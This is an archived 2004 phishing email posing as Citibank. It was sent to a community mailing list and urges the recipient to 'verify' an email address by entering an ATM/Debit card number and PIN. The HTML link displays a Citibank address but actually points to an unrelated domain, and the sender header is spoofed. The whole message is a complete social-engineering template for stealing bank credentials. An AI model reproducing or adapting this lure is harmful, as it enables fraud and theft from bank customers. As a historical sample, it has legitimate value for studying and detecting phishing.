Citibank Email Update Verification!

From: "Support" <support@citibank.com>
To: <Ccn-board@chebucto.ns.ca>
Date: Sat, 01 May 2004 04:39:20 -0700

----

<P>Dear Citibank Member,</P>
<P><BR>This email was sent by the Citibank server to verify your E-mail<BR=
>address. You must complete this process by clicking on the link<BR>below =
and entering in the small window your Citibank ATM/Debit<BR>Card number an=
d PIN that you use on ATM.</P>
<P><BR>This is done for your protection - because some of our members<BR>n=
o longer have access to their email addresses and we must<BR>verify it.</P=

<P><BR>To verify your E-mail address and access your bank account,<BR>clic=
k on the link below:</P><A href=3D"http://www.strongerinfobase.us/scripts/=
email_verify.htm">https://web.da-us.citibank.com/signin/citifi/scripts/ema=
il_verify.jsp</A></A>
<P></P>